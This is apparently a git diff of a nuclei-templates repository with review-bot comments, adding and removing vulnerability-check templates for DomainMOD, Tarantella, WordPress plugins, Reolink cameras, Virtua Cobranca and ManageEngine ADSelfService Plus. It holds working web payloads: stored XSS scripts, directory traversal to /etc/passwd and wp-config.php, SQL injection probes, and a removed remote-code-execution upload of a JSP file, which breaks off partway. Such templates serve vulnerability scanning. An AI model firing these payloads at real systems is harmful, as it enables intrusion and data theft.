--git a/nuclei-templates/CVE-2018/CVE-2018-19751.yaml b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml new file mode 100644 index 0000000000..e6ff1a9869 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml 
@@ -0,0 +1,52 @@
+id: CVE-2018-19751
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
+ reference:
+ - https://www.exploit-db.com/exploits/45947/
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
+ - https://github.com/domainmod/domainmod/issues/83
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-19751
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2018,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /admin/ssl-fields/add.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test
+ - |
+ GET /admin/ssl-fields/ HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '">'
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19753.yaml b/nuclei-templates/CVE-2018/CVE-2018-19753.yaml
deleted file mode 100644
index 0af644b43a..0000000000
--- a/nuclei-templates/CVE-2018/CVE-2018-19753.yaml
+++ /dev/null
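Review bot: The second raw request stores a script value in the target's SSL-field list and nothing removes it afterwards, so every scan leaves a persistent record in an admin page of the scanned instance; the same holds for CVE-2018-19914, CVE-2018-20009 and CVE-2018-20011 added further down. The `tags` line should carry `intrusive` (`tags: cve,cve2018,domainmod,xss,authenticated,intrusive`) so operators can exclude these templates from production scans, and a unique marker such as `{{randstr}}` in the stored value would make leftovers easy to find and clean up. In this file the three matchers are also not tied to the final response: unlike its siblings it has no `req-condition: true` and no `_3` suffixes, so the login response can satisfy them. As shown here the body word is `'">'`, which nearly any HTML page contains; unless that is an artefact of how this page was rendered, it needs the full stored marker.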
@@ -1,31 +0,0 @@ -id: CVE-2018-19753 -info: - name: Tarantella Enterprise Directory Traversal - author: 0x_Akoko - severity: high - description: Tarantella Enterprise versions prior to 3.11 suffer from a directory traversal vulnerability. - reference: - - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html - - https://www.cvedetails.com/cve/CVE-2018-19753 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-19753 - cwe-id: CWE-22 - tags: cve,cve2018,tarantella,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml new file mode 100644 index 0000000000..f74e59b810 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml 
@@ -0,0 +1,46 @@
+id: CVE-2018-19914
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
+ reference:
+ - https://www.exploit-db.com/exploits/46375/
+ - https://github.com/domainmod/domainmod/issues/87
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-19914
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2018,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/dns.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+ - |
+ GET /assets/dns.php HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(all_headers_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
diff --git a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml
new file mode 100644
index 0000000000..e6a0801a38
--- /dev/null
+++ b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml
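Review bot: The last DSL condition, `contains(body_3, ">")`, is true for practically any HTML response as it appears on this page, which would leave the status code and the `text/html` header as the only real checks and report every reachable DomainMOD list page; CVE-2018-20009 and CVE-2018-20011 below carry the same line. If the stored value was lost when this page was rendered that is only a display problem, otherwise the condition should test for the exact value the second request stored. A comment above `matchers:` such as `# evaluate only response 3, where the stored value is rendered` would also record why `req-condition` is set.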
@@ -0,0 +1,47 @@
+id: CVE-2018-20009
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider.php ssl-provider-name, ssl-provider's-url parameters.
+ reference:
+ - https://github.com/domainmod/domainmod/issues/88
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20009
+ - https://www.exploit-db.com/exploits/46372/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-20009
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2018,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/ssl-provider.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=
+ - |
+ GET /assets/ssl-providers.php HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(all_headers_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
diff --git a/nuclei-templates/CVE-2018/CVE-2018-20011.yaml b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml
new file mode 100644
index 0000000000..b48e1aa0cb
--- /dev/null
+++ b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml
@@ -0,0 +1,47 @@
+id: CVE-2018-20011
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters.
+ reference:
+ - https://www.exploit-db.com/exploits/46374/
+ - https://github.com/domainmod/domainmod/issues/88
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20011
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-20011
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve1028,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/category.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=
+ - |
+ GET /assets/categories.php HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(all_headers_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
diff --git a/nuclei-templates/CVE-2018/cve-2018-2893.yaml b/nuclei-templates/CVE-2018/CVE-2018-2893.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-2893.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-2893.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-2894.yaml b/nuclei-templates/CVE-2018/CVE-2018-2894.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-2894.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-2894.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-5230.yaml b/nuclei-templates/CVE-2018/CVE-2018-5230.yaml
index ec997e4f28..7501600a4f 100644
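Review bot: The `tags` line of CVE-2018-20011 reads `cve,cve1028,domainmod,xss,authenticated`; `cve1028` is a typo for `cve2018`, so a run filtered on the `cve2018` tag silently skips this template. It should be `tags: cve,cve2018,domainmod,xss,authenticated`. The reference `https://github.com/domainmod/domainmod/issues/88` is the same one listed for CVE-2018-20009, which looks like a copy and is worth checking against the advisory.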
--- a/nuclei-templates/CVE-2018/CVE-2018-5230.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-5230.yaml @@ -1,5 +1,4 @@ id: CVE-2018-5230 - info: name: Atlassian Confluence Status-List XSS author: madrobot @@ -16,26 +15,22 @@ info: metadata: shodan-query: http.component:"Atlassian Confluence" tags: cve,cve2018,atlassian,confluence,xss - requests: - method: GET path: - "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '" - - "adsf/js/" - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-37589.yaml b/nuclei-templates/CVE-2021/CVE-2021-37589.yaml new file mode 100644 index 0000000000..f10ff799c2 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-37589.yaml 
@@ -0,0 +1,55 @@
+id: CVE-2021-37589
+info:
+ name: Virtua Software Cobranca <12R - Blind SQL Injection
+ author: princechaddha
+ severity: high
+ description: |
+ Virtua Cobranca before 12R allows blind SQL injection on the login page.
+ reference:
+ - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
+ - https://www.virtuasoftware.com.br/
+ - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-37589
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-37589
+ cwe-id: CWE-89
+ metadata:
+ shodan-query: http.favicon.hash:876876147
+ verified: "true"
+ tags: cve,cve2021,virtua,sqli
+requests:
+ - raw:
+ - |
+ POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ - |
+ POST /controller/login.php?acao=autenticar HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+
+ idusuario='&idsenha=test&tipousr=Usuario
+ - |
+ POST /controller/login.php?acao=autenticar HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+
+ idusuario=''&idsenha=a&tipousr=Usuario
+ cookie-reuse: true
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_3, "Os parametros não estão informados corretamente")'
+ - 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")'
+ condition: or
+ - type: dsl
+ dsl:
+ - "status_code_2 == 500 && status_code_3 == 200"
+
+# Enhanced by mp on 2022/06/30
diff --git a/nuclei-templates/CVE-2021/CVE-2021-37704.yaml b/nuclei-templates/CVE-2021/CVE-2021-37704.yaml
deleted file mode 100644
index c5f5f6eb0f..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-37704.yaml
+++ /dev/null
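Review bot: The first DSL matcher compares `body_3` with two full sentences that contain accented characters (`não`, `estão`, `está`); if the application answers in a legacy single-byte encoding, which cannot be told from this hunk, the UTF-8 literals never match and an affected host is missed. Matching on the ASCII tails is more robust: `'contains(body_3, "informados corretamente")'` and `'contains(body_3, "informado corretamente")'`. A comment above the second matcher stating that a 500 on request 2 and a 200 on request 3 is the signal being tested would help whoever triages a hit.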
@@ -1,46 +0,0 @@ -id: CVE-2021-37704 - -info: - name: phpfastcache - phpinfo Resource Exposure - author: whoever - severity: medium - description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. - reference: - - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 - - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc - - https://packagist.org/packages/phpfastcache/phpfastcache - - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 - cve-id: CVE-2021-37704 - cwe-id: CWE-668 - tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork - -requests: - - method: GET - path: - - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php" - - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' - -# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-37833.yaml b/nuclei-templates/CVE-2021/CVE-2021-37833.yaml deleted file mode 100644 index d4af2272cc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-37833.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-37833 - -info: - name: Hotel Druid 3.0.2 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands. - reference: - - https://github.com/dievus/CVE-2021-37833 - - https://www.hoteldruid.com - - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-37833 - cwe-id: CWE-79 - tags: cve,cve2021,hoteldruid,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1' - - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1' - - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1' - - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' - - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - words: - - '' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-38647.yaml b/nuclei-templates/CVE-2021/CVE-2021-38647.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-38647.yaml rename to nuclei-templates/CVE-2021/CVE-2021-38647.yaml 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-38702.yaml b/nuclei-templates/CVE-2021/CVE-2021-38702.yaml deleted file mode 100644 index 963ec25c42..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-38702.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-38702 - -info: - name: Cyberoam NetGenie Cross-Site Scripting - author: geeknik - severity: medium - description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. - reference: - - https://seclists.org/fulldisclosure/2021/Aug/20 - - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 - - http://www.cyberoamworks.com/NetGenie-Home.asp - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-38702 - cwe-id: CWE-79 - tags: cve2021,cyberoam,netgenie,xss,router,seclists,cve - -requests: - - method: GET - path: - - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - - - type: word - words: - - "text/html" - part: header - - - type: status - status: - - 200 - -# Enhanced by cs on 2022/04/01 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39312.yaml b/nuclei-templates/CVE-2021/CVE-2021-39312.yaml deleted file mode 100644 index 02e3b11697..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39312.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2021-39312 -info: - name: WordPress True Ranker <2.2.4 - Local File Inclusion - author: DhiyaneshDK - severity: high - description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. - reference: - - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 - - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php - - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 - remediation: Fixed in version 2.2.4 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-39312 - cwe-id: CWE-22,CWE-22 - tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr -requests: - - raw: - - | - POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-39322.yaml b/nuclei-templates/CVE-2021/CVE-2021-39322.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39322.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39322.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-39327.yaml b/nuclei-templates/CVE-2021/CVE-2021-39327.yaml deleted file mode 100644 index 4f63002f43..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39327.yaml +++ /dev/null 
@@ -1,43 +0,0 @@ -id: CVE-2021-39327 - -info: - name: WordPress BulletProof Security 5.1 Information Disclosure - author: geeknik - severity: medium - description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. - reference: - - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-39327 - cwe-id: CWE-200 - tags: exposure,packetstorm,cve,cve2021,wordpress - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt' - - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'BPS DB BACKUP LOG' - - '==================' - condition: and - - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'text/plain' - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2021/cve-2021-39350.yaml b/nuclei-templates/CVE-2021/CVE-2021-39350.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39350.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39350.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-39501.yaml b/nuclei-templates/CVE-2021/CVE-2021-39501.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39501.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39501.yaml 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml
new file mode 100644
index 0000000000..22c1d83310
--- /dev/null
+++ b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-40149
+info:
+ name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
+ author: For3stCo1d
+ severity: high
+ description: |
+ Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
+ reference:
+ - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
+ - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
+ classification:
+ cve-id: CVE-2021-40149
+ metadata:
+ shodan-query: http.title:"Reolink"
+ verified: "true"
+ tags: cve,cve2021,reolink,camera,iot,exposure,unauth
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/self.key"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "-----BEGIN RSA PRIVATE KEY-----"
+ - "-----END RSA PRIVATE KEY----"
+ condition: and
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/30
diff --git a/nuclei-templates/CVE-2021/CVE-2021-40150.yaml b/nuclei-templates/CVE-2021/CVE-2021-40150.yaml
deleted file mode 100644
index 7c25b1aef3..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-40150.yaml
+++ /dev/null
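Review bot: The footer entry in the `words` list of the new CVE-2021-40149 template, `"-----END RSA PRIVATE KEY----"`, ends with four dashes where a PEM footer has five; it still matches as a substring, but it reads as a typo and should be `- "-----END RSA PRIVATE KEY-----"`. The word matcher names no `part`, so it depends on the engine default; `part: body` would state the intent. The `info` block has no `remediation` line and `classification` carries only `cve-id`, so a finding gives the operator no next step; something like `remediation: Update the camera firmware and treat the exposed key as compromised.` would help, with the wording to be confirmed against the linked advisory.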
@@ -1,33 +0,0 @@ -id: CVE-2021-40150 -info: - name: Reolink E1 Zoom Camera - Information Disclosure - author: For3stCo1d - severity: medium - description: | - The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. - An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations. - reference: - - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt - - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150 - classification: - cve-id: CVE-2021-40150 - metadata: - verified: true - shodan-query: http.title:"Reolink" - tags: cve,cve2021,reolink,camera,exposure,iot -requests: - - method: GET - path: - - "{{BaseURL}}/conf/nginx.conf" - matchers-condition: and - matchers: - - type: word - words: - - "server" - - "listen" - - "fastcgi" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-40438.yaml b/nuclei-templates/CVE-2021/CVE-2021-40438.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-40438.yaml rename to nuclei-templates/CVE-2021/CVE-2021-40438.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40539.yaml b/nuclei-templates/CVE-2021/CVE-2021-40539.yaml deleted file mode 100644 index a0ae656661..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40539.yaml +++ /dev/null 
@@ -1,116 +0,0 @@ -id: CVE-2021-40539 - -info: - name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution - author: daffainfo,pdteam - severity: critical - description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. - reference: - - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - - https://github.com/synacktiv/CVE-2021-40539 - - https://nvd.nist.gov/vuln/detail/CVE-2021-40539 - remediation: Upgrade to ADSelfService Plus build 6114. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-40539 - cwe-id: CWE-287 - tags: cve,cve2021,rce,ad,intrusive,manageengine,cisa - -requests: - - - raw: - - | - POST /./RestAPI/LogonCustomization HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458 - - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="methodToCall" - - unspecified - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="Save" - - yes - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="form" - - smartcard - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="operation" - - Add - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp" - - <%@ page import="java.util.*,java.io.*"%> - <%@ page import="java.security.MessageDigest"%> - <% - String cve = "CVE-2021-40539"; - MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); - alg.update(cve.getBytes()); - byte[] digest = alg.digest(); - StringBuffer hashedpasswd = new StringBuffer(); - String hx; - for (int i=0;i - --8b1ab266c41afb773af2e064bc526458-- - - - | 
- POST /./RestAPI/LogonCustomization HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b - - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="methodToCall" - - unspecified - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="Save" - - yes - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="form" - - smartcard - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="operation" - - Add - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class" - - 